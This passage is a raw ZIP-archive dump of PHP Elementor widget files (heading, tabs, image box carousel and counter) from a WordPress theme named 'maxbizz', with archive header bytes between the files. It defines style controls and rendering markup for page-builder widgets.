				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-heading .main-head' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'title_typography',
				'selector' => '{{WRAPPER}} .ot-heading .main-head',
			]
		);

		$this->end_controls_section();

	}

	protected function render() {
		$settings = $this->get_settings_for_display();
		
		$hl = $settings['subtitle_style'];
		

		$this->add_render_attribute( 'subtitle', 'class', $hl );
		$this->add_render_attribute( 'heading', 'class', 'main-head' );
		$title = $settings['title'];
		$title_html = sprintf( '<%1$s %2$s>%3$s</%1$s>', $settings['header_size'], $this->get_render_attribute_string( 'heading' ), $title );
		?>
		<div class="ot-heading">
	        <?php if( ! empty( $settings['sub'] ) ) { echo '<span '.$this->get_render_attribute_string( 'subtitle' ).'>' .$settings['sub']. '</span>'; } ?>
	        <?php if( ! empty( $settings['title'] ) ) { echo $title_html; } ?>
	    </div>
	    <?php
	}

	protected function _content_template() {}
}
// After the Schedule class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Heading() );PK�8FZXM�
 
 &inc/backend/elementor/widgets/tabs.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Tabs
 */
class Maxbizz_Tabs extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'itabs';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Tabs', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-tabs';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	protected function _register_controls() {

		//Content Service box
		$this->start_controls_section(
			'content_section',
			[
				'label' => __( 'Tabs', 'maxbizz' ),
			]
		);

		$repeater = new Repeater();

		$repeater->add_control(
			'tab_title',
			[
				'label' => __( 'Title & Description', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => __( 'Tab Title', 'maxbizz' ),
				'placeholder' => __( 'Tab Title', 'maxbizz' ),
				'label_block' => true,
			]
		);

		$repeater->add_control(
			'tab_content',
			[
				'label' => __( 'Content', 'maxbizz' ),
				'default' => __( 'Tab Content', 'maxbizz' ),
				'placeholder' => __( 'Tab Content', 'maxbizz' ),
				'type' => Controls_Manager::WYSIWYG,
				'show_label' => false,
			]
		);

		$this->add_control(
			'ot_tabs',
			[
				'label' => __( 'Tabs Items', 'maxbizz' ),
				'type' => Controls_Manager::REPEATER,
				'fields' => $repeater->get_controls(),
				'default' => [
					[
						'tab_title' => __( 'Tab #1', 'maxbizz' ),
						'tab_content' => __( 'We help ambitious businesses like yours generate more profits by building awareness, driving web traffic, connecting with customers, and growing overall sales. Give us a call.', 'maxbizz' ),
					],
					[
						'tab_title' => __( 'Tab #2', 'maxbizz' ),
						'tab_content' => __( 'We help ambitious businesses like yours generate more profits by building awareness, driving web traffic, connecting with customers, and growing overall sales. Give us a call.', 'maxbizz' ),
					],
				],
				'title_field' => '{{{ tab_title }}}',
			]
		);

		$this->end_controls_section();

		//Style
		/* title */
		$this->start_controls_section(
			'style_title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_responsive_control(
			'title_width',
			[
				'label' => __( 'Width', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'size_units' => [ 'px', '%' ],
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 300,
					],
					'%' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .ot-tabs .tab-link' => 'min-width: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_responsive_control(
			'title_space',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .ot-tabs .tab-link' => 'margin: 0 calc({{SIZE}}{{UNIT}}/2);',
					'{{WRAPPER}} .ot-tabs .tabs-heading' => 'margin: 0 calc(-{{SIZE}}{{UNIT}}/2);',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'title_typography',
				'selector' => '{{WRAPPER}} .ot-tabs .tab-link',
				'separator' => 'before',
			]
		);
		
		$this->start_controls_tabs( 'tabs_title_style' );

		$this->start_controls_tab(
			'tab_title_normal',
			[
				'label' => __( 'Normal', 'maxbizz' ),
			]
		);

		$this->add_control(
			'title_bgcolor',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-tabs .tab-link:not(.current)' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'title_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-tabs .tab-link:not(.current)' => 'color: {{VALUE}};',
				]
			]
		);

		$this->add_group_control(
			Group_Control_Border::get_type(),
			[
				'name' => 'title_border',
				'selector' => '{{WRAPPER}} .ot-tabs .tab-link',
			]
		);

		$this->end_controls_tab();

		$this->start_controls_tab(
			'tab_title_active',
			[
				'label' => __( 'Active/Hover', 'maxbizz' ),
			]
		);

		$this->add_control(
			'title_bg_active',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-tabs .tab-link.current, {{WRAPPER}} .ot-tabs .tab-link:hover' => 'background: {{VALUE}};',
				]
			]
		);
		
		$this->add_control(
			'title_color_active',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-tabs .tab-link.current, {{WRAPPER}} .ot-tabs .tab-link:hover' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'title_border_active',
			[
				'label' => __( 'Border Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-tabs .tab-link.current, {{WRAPPER}} .ot-tabs .tab-link:hover' => 'border-color: {{VALUE}};',
				]
			]
		);

		$this->end_controls_tab();

		$this->end_controls_tabs();

		$this->end_controls_section();

		/* content */
		$this->start_controls_section(
			'style_content',
			[
				'label' => __( 'Content', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_control(
			'content_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-tabs .tab-content' => 'color: {{VALUE}};',
					'{{WRAPPER}} .tab-content ul li:before, {{WRAPPER}} .tab-content ol li:before' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'content_typography',
				'selector' => '{{WRAPPER}} .ot-tabs .tab-content',
			]
		);
		
		$this->add_responsive_control(
			'content_padding',
			[
				'label' => __( 'Padding', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', 'em', '%' ],
				'selectors' => [
					'{{WRAPPER}} .ot-tabs .tab-content' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);

		$this->end_controls_section();

	}

	protected function render() {
		$settings = $this->get_settings_for_display();
		?>

		<div class="ot-tabs">
			<?php $random = rand(1,1000); if ( $settings['ot_tabs'] ) : ?>
			<ul class="tabs-heading unstyle">
				<?php $i = 1; foreach ( $settings['ot_tabs'] as $tabs ) { ?>
				<li class="tab-link" data-tab="tab-<?php echo esc_attr($i.$random); ?>"><?php echo $tabs['tab_title']; ?></li>
				<?php $i++; } ?>
			</ul>
			<?php $j = 1; foreach ( $settings['ot_tabs'] as $tabs ) { ?>
			<div id="tab-<?php echo esc_attr($j.$random); ?>" class="tab-content">
				<?php echo $tabs['tab_content']; ?>
			</div>
			<?php $j++; } endif; ?>
	    </div>

	    <?php
	}

	protected function _content_template() {}
}
// After the Maxbizz_Tabs class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Tabs() );PK�8FZAˣ'J'J4inc/backend/elementor/widgets/image-box-carousel.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Image Box Carousel
 */
class Maxbizz_Image_Box_Carousel extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'iiboxcarousel';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Image Box Carousel', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-posts-carousel';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	protected function _register_controls() {

		//Content Image box
		$this->start_controls_section(
			'content_section',
			[
				'label' => __( 'Image Box', 'maxbizz' ),
			]
		);
		$this->add_responsive_control(
			'align',
			[
				'label' => __( 'Alignment', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'options' => [
					'left'    => [
						'title' => __( 'Left', 'maxbizz' ),
						'icon' => 'eicon-text-align-left',
					],
					'center' => [
						'title' => __( 'Center', 'maxbizz' ),
						'icon' => 'eicon-text-align-center',
					],
					'right' => [
						'title' => __( 'Right', 'maxbizz' ),
						'icon' => 'eicon-text-align-right',
					]
				],
				'selectors' => [
					'{{WRAPPER}} .ot-image-box' => 'text-align: {{VALUE}};',
				],
			]
		);
		$repeater = new Repeater();
		$repeater->add_control(
			'image_box',
			[
				'label' => __( 'Image', 'maxbizz' ),
				'type' => Controls_Manager::MEDIA,
			]
		);

		$repeater->add_control(
			'title_box',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::TEXTAREA,
				'default' => 'Accounting & Finance',
			]
		);
		$repeater->add_control(
			'content_box',
			[
				'label' => __( 'Description', 'maxbizz' ),
				'type' => Controls_Manager::TEXTAREA,
				'rows' => '10',
				'default' => 'A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.',
			]
		);
		$repeater->add_control(
			'link_box',
			[
				'label' => __( 'Link', 'maxbizz' ),
				'type' => Controls_Manager::URL,
				'placeholder' => __( 'https://your-link.com', 'maxbizz' ),
				'default' => [
					'url' => '#'
				],
			]
		);
		$this->add_control(
		    'image_boxes',
		    [
		        'label'       => '',
		        'type'        => Controls_Manager::REPEATER,
				'show_label'  => false,
		        'fields'      => array_values( $repeater->get_controls() ),
		        'title_field' => '{{{title_box}}}',
		    ]
		);
		
	    $this->add_group_control(
			Group_Control_Image_Size::get_type(),
			[
				'name' => 'image_box_size', 
				'exclude' => ['1536x1536', '2048x2048'],
				'include' => [],
				'default' => 'full',
			]
		);
		$this->add_control(
			'header_size',
			[
				'label' => __( 'Title HTML Tag', 'elementor' ),
				'type' => Controls_Manager::SELECT,
				'options' => [
					'h1' => 'H1',
					'h2' => 'H2',
					'h3' => 'H3',
					'h4' => 'H4',
					'h5' => 'H5',
					'h6' => 'H6',
					'div' => 'div',
					'span' => 'span',
					'p' => 'p',
				],
				'default' => 'h5',
			]
		);
		$this->add_control(
			'label_link',
			[
				'label' => 'Label Button',
				'type' => Controls_Manager::TEXT,
				'default' => __( 'Explore More', 'maxbizz' ),
				'label_block' => true
			]
		);

		$slides_show = range( 1, 10 );
		$slides_show = array_combine( $slides_show, $slides_show );

		$this->add_responsive_control(
			'tshow',
			[
				'label' => __( 'Slides To Show', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'options' => [
					'' => __( 'Default', 'maxbizz' ),
				] + $slides_show,
				'default' => '',
				'separator' => 'before',
			]
		);
		$this->add_control(
			'loop',
			[
				'label' => __( 'Loop', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'false',
				'options' => [
					'true' => __( 'Yes', 'maxbizz' ),
					'false' => __( 'No', 'maxbizz' ),
				]
			]
		);
		$this->add_control(
			'autoplay',
			[
				'label' => __( 'Autoplay', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'true',
				'options' => [
					'true' => __( 'Yes', 'maxbizz' ),
					'false' => __( 'No', 'maxbizz' ),
				]
			]
		);
		$this->add_control(
			'timeout',
			[
				'label' => __( 'Autoplay Timeout', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min'  => 1000,
						'max'  => 20000,
						'step' => 1000,
					],
				],
				'default' => [
					'size' => 7000,
				],
				'condition' => [
					'autoplay' => 'true',
				]
			]
		);
		$this->add_control(
			'arrows',
			[
				'label' => __( 'Arrows', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'false',
				'options' => [
					'true'   => __( 'Yes', 'maxbizz' ),
					'false'  => __( 'No', 'maxbizz' ),
				],
			]
		);
		$this->add_control(
			'dots',
			[
				'label' => __( 'Dots', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'true',
				'options' => [
					'true'   => __( 'Yes', 'maxbizz' ),
					'false'  => __( 'No', 'maxbizz' ),
				],
			]
		);
		$this->add_responsive_control(
			'w_gaps',
			[
				'label' => __( 'Gap Width', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
			]
		);

		$this->end_controls_section();

		/***Style***/

		$this->start_controls_section(
			'style_content_section',
			[
				'label' => __( 'Content', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		/* gereral */
		$this->add_control(
			'heading_gereral',
			[
				'label' => __( 'Gereral', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
			]
		);
		$this->add_control(
			'box_bg',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-image-box .content-box' => 'background: {{VALUE}};',
				],
			]
		);
		$this->add_responsive_control(
			'box_padding',
			[
				'label' => __( 'Padding Box', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', 'em', '%' ],
				'selectors' => [
					'{{WRAPPER}} .content-box' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'radius_box',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .ot-image-box' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Box_Shadow::get_type(),
			[
				'name' => 'box_box_shadow',
				'selector' => '{{WRAPPER}} .ot-image-box',
			]
		);

		/* title */
		$this->add_control(
			'heading_title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_responsive_control(
			'title_space',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .title-box' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'title_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .title-box a' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'title_hcolor',
			[
				'label' => __( 'Hover Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .title-box a:hover' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'title_typography',
				'selector' => '{{WRAPPER}} .title-box',
			]
		);

		/* description */
		$this->add_control(
			'heading_des',
			[
				'label' => __( 'Description', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_control(
			'des_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .content-box p' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'des_typography',
				'selector' => '{{WRAPPER}} .content-box p',
			]
		);

		/* button */
		$this->add_control(
			'heading_btn',
			[
				'label' => __( 'Button', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
				'condition' => [
					'label_link!' => '',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'btn_typography',
				'selector' => '{{WRAPPER}} .link-box',
				'condition' => [
					'label_link!' => '',
				],
			]
		);
		$this->start_controls_tabs( 'tabs_btn_style' );
		$this->start_controls_tab(
			'tab_btn_normal',
			[
				'label' => __( 'Normal', 'maxbizz' ),
				'condition' => [
					'label_link!' => '',
				],
			]
		);

		$this->add_control(
			'btn_bg_color',
			[
				'label' => __( 'Background Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .link-box' => 'background: {{VALUE}};',
				],
				'condition' => [
					'label_link!' => '',
				],
			]
		);
		$this->add_control(
			'btn_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .link-box' => 'color: {{VALUE}};',
				],
				'condition' => [
					'label_link!' => '',
				],
			]
		);
		$this->add_control(
			'btn_bcolor',
			[
				'label' => __( 'Border Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .link-box' => 'border-color: {{VALUE}};',
				],
				'condition' => [
					'label_link!' => '',
				],
			]
		);
		$this->end_controls_tab();

		$this->start_controls_tab(
			'tab_btn_hover',
			[
				'label' => __( 'Hover', 'maxbizz' ),
				'condition' => [
					'label_link!' => '',
				],
			]
		);
		$this->add_control(
			'hover_btn_bg_color',
			[
				'label' => __( 'Background Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .link-box:hover' => 'background: {{VALUE}}; border-color: {{VALUE}};',
				],
				'condition' => [
					'label_link!' => '',
				],
			]
		);
		$this->add_control(
			'hover_btn_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .link-box:hover' => 'color: {{VALUE}};',
				],
				'condition' => [
					'label_link!' => '',
				],
			]
		);
		$this->end_controls_tab();

		$this->end_controls_tabs();

		$this->end_controls_section();

		// Dots.
		$this->start_controls_section(
			'navigation_section',
			[
				'label' => __( 'Dots', 'maxbizz' ),
				'tab' => Controls_Manager::TAB_STYLE,
				'condition' => [
					'dots' => 'true',
				],
			]
		);

		$this->add_responsive_control(
			'dots_spacing',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => -200,
						'max' => 200,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .owl-dots' => 'bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);

		$this->add_control(
            'dots_bgcolor',
            [
                'label' => __( 'Color', 'maxbizz' ),
                'type' => Controls_Manager::COLOR,
                'selectors' => [
					'{{WRAPPER}} .owl-dots button.owl-dot span' => 'background: {{VALUE}};',
				],
            ]
        );

        $this->add_control(
            'dots_active_bgcolor',
            [
                'label' => __( 'Color Active', 'maxbizz' ),
                'type' => Controls_Manager::COLOR,
                'selectors' => [
					'{{WRAPPER}} .owl-dots button.owl-dot.active span' => 'background: {{VALUE}};',
				],
            ]
        );

        $this->end_controls_section();

        // Arrows.
		$this->start_controls_section(
			'style_nav',
			[
				'label' => __( 'Arrows', 'maxbizz' ),
				'tab' => Controls_Manager::TAB_STYLE,
				'condition' => [
					'arrows' => 'true',
				],
			]
		);
		$this->add_responsive_control(
			'arrow_spacing',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => -200,
						'max' => 200,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .owl-nav .owl-prev' => 'left: {{SIZE}}{{UNIT}};',
					'{{WRAPPER}} .owl-nav .owl-next' => 'right: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_responsive_control(
			'arrow_width',
			[
				'label' => __( 'Width', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 30,
						'max' => 70,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .owl-nav button' => 'width: {{SIZE}}{{UNIT}}; height: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'arrow_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button' => 'color: {{VALUE}};',
				]
			]
		);
		
		$this->add_control(
			'arrow_bg_color',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'arrow_hcolor',
			[
				'label' => __( 'Color Hover', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button:hover' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'arrow_bg_hcolor',
			[
				'label' => __( 'Background Hover', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button:hover' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'radius_arrow',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .owl-nav button' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);

		$this->end_controls_section();

	}

	protected function render() {
		$settings = $this->get_settings_for_display();
		$this->add_render_attribute( 'heading', 'class', 'title-box' );
		?>
		<div class="image-box-carousel" data-loop="<?php echo $settings['loop']; ?>" data-auto="<?php echo $settings['autoplay']; ?>" data-time="<?php echo $settings['timeout']['size']; ?>" data-arrows="<?php echo $settings['arrows']; ?>" data-dots="<?php echo $settings['dots']; ?>" data-show="<?php echo $settings['tshow']; ?>" data-tshow="<?php echo esc_attr( $settings['tshow_tablet'] ); ?>" data-mshow="<?php echo esc_attr( $settings['tshow_mobile'] ); ?>" data-gaps="<?php echo esc_attr( $settings['w_gaps']['size'] ); ?>" data-tgaps="<?php echo esc_attr( $settings['w_gaps_tablet']['size'] ); ?>" data-mgaps="<?php echo $settings['w_gaps_mobile']['size']; ?>">
			<div class="owl-carousel owl-theme">
				<?php foreach ( $settings['image_boxes'] as $key => $boxes ) : 
					$photo_url = Group_Control_Image_Size::get_attachment_image_src( $boxes['image_box']['id'], 'image_box_size', $settings );
					$photo = '<img src="' . esc_url( $photo_url ) . '" alt="' . esc_attr( $boxes['title_box'] ) . '">';
					$tbox  = $boxes['title_box'];
					$tbox_html = sprintf( '<%1$s %2$s>%3$s</%1$s>', $settings['header_size'], $this->get_render_attribute_string( 'heading' ), $tbox );

					if ( ! empty( $boxes['link_box']['url'] ) ) {
						$this->add_render_attribute( 'm_link' . $key, 'href', $boxes['link_box']['url'] );

						if ( $boxes['link_box']['is_external'] ) {
							$this->add_render_attribute( 'm_link' . $key, 'target', '_blank' );
						}

						if ( $boxes['link_box']['nofollow'] ) {
							$this->add_render_attribute( 'm_link' . $key, 'rel', 'nofollow' );
						}

						$photo = '<a ' .$this->get_render_attribute_string( 'm_link' . $key ). '>' .$photo. '</a>';
						$tbox_html = sprintf( '<%1$s %2$s><a ' .$this->get_render_attribute_string( 'm_link'. $key ). '>%3$s</a></%1$s>', $settings['header_size'], $this->get_render_attribute_string( 'heading' ), $tbox );
					}
					$this->add_render_attribute( 'm_link'. $key, 'class', 'link-box font-second' );
				?>
				<div class="ot-image-box">
					<?php if( $boxes['image_box']['url'] ) { echo $photo; } ?>
					<div class="content-box">
						<?php if( $boxes['title_box'] ) { echo $tbox_html; } ?>
						<?php if( $boxes['content_box'] ) { echo '<p>' .$boxes['content_box']. '</p>'; } ?>
					</div>
					<?php if( $settings['label_link'] && $boxes['link_box']['url'] !== '' ){ echo '<a ' .$this->get_render_attribute_string( 'm_link'. $key ). '><span>' .$settings['label_link']. '</span><i class="ot-flaticon-trajectory"></i></a>'; } ?>
				</div>
				<?php endforeach; ?>
			</div>
		</div>

	    <?php
	}

	protected function _content_template() {}

	public function get_keywords() {
		return [ 'service' ];
	}
}
// After the Maxbizz_Image_Box_Carousel class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Image_Box_Carousel() );PK�8FZ�����.inc/backend/elementor/widgets/counter-icon.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Counter 2
 */
class Maxbizz_Counter2 extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'icounter2';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Counter 2', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-counter';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	protected function _register_controls() {

		$this->start_controls_section(
			'content_section',
			[
				'label' => __( 'Counter', 'maxbizz' ),
			]
		);
		$this->add_responsive_control(
			'align',
			[
				'label' => __( 'Alignment', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'options' => [
					'left'    => [
						'title' => __( 'Left', 'maxbizz' ),
						'icon' => 'eicon-text-align-left',
					],
					'center' => [
						'title' => __( 'Center', 'maxbizz' ),
						'icon' => 'eicon-text-align-center',
					],
					'right' => [
						'title' => __( 'Right', 'maxbizz' ),
						'icon' => 'eicon-text-align-right',
					],
				],
				'selectors' => [
					'{{WRAPPER}} .ot-counter-2' => 'text-align: {{VALUE}};',
				],
			]
		);

		$this->add_control(
			'icon_font',
			[
				'label' => __( 'Icon', 'maxbizz' ),
				'type' => Controls_Manager::ICONS,
				'fa4compatibility' => 'icon',
				'default' => [
					'value' => 'fas fa-star',
					'library' => 'fa-solid',
				],
			]
		);

		$this->add_control(
			'title',
			[
				'label' => __( 'Title:', 'maxbizz' ),
				'type' => Controls_Manager::TEXTAREA,
				'default' => __( 'Current Clients', 'maxbizz' ),
			]
		);

		$this->add_control(
			'number',
			[
				'label' => 'Number:',
				'type' => Controls_Manager::TEXT,
				'default' => __( '180', 'maxbizz' ),
			]
		);

		$this->add_control(
			'after_number',
			[
				'label' => __( 'After Number:', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => __( '', 'maxbizz' ),
			]
		);		

		$this->add_control(
			'time',
			[
				'label' => __( 'Duration', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min'  => 1000,
						'max'  => 10000,
						'step' => 1000,
					],
				],
				'default' => [
					'unit' => 'px',
					'size' => 2000,
				],
			]
		);

		$this->end_controls_section();

		//Style

		$this->start_controls_section(
			'style_content_section',
			[
				'label' => __( 'Style', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		/* icon */
		$this->add_control(
			'heading_icon',
			[
				'label' => __( 'Icon', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_responsive_control(
			'icon_space',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .ot-counter-2 i, {{WRAPPER}} .ot-counter-2 svg' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'icon_color',
			[
